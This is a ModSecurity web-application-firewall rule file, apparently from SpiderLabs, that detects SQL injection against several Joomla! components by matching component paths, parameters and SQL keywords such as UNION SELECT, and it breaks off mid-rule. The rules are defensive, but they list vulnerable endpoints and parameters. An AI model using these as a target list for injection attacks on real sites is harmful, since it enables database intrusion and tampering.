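    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009941,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'"
    SecRule REQUEST_LINE "@contains task=editsurvey&" "chain"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 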
Survey Manager Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009942,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009943) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009943,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JBudgetsMagic \'bid\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009944) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009944,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009945,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JBudgetsMagic \'bid\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009946) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009946,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009947) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic 'bid' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_jbudgetsmagic" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009947,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36461/info'" SecRule REQUEST_LINE "@contains view=mybudget&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JBudgetsMagic \'bid\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009956) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009956,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009957) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009957,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JoomlaFacebook Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009958) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009958,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009959) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009959,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
JoomlaFacebook Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009960) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_facebook" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009960,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36484/info'" SecRule REQUEST_LINE "@contains view=student" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! JoomlaFacebook Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009961) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SportFusion Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009962,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009963) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009963,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SportFusion Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SportFusion Component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_sportfusion" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SportFusion Component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36481/info'" SecRule REQUEST_LINE "@contains view=teamdetail" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SportFusion Component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010014,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010015) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010015,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! 
Game Server Component \'id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010016) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010016,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010017) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010017,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! Game Server Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! 
Game Server Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_gameserver" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010018,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36213/info'" SecRule REQUEST_LINE "@contains view=gamepanel" "chain" SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla Game Server Component id Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010040,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
CB Resume Builder \'group_id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010041) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010041,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010042) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010042,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
CB Resume Builder \'group_id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010043) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010043,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010044) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder 'group_id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_cbresumebuilder" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010044,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36598/info'" SecRule REQUEST_LINE "@contains task=group_members" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
CB Resume Builder \'group_id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010045,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010046) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010046,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
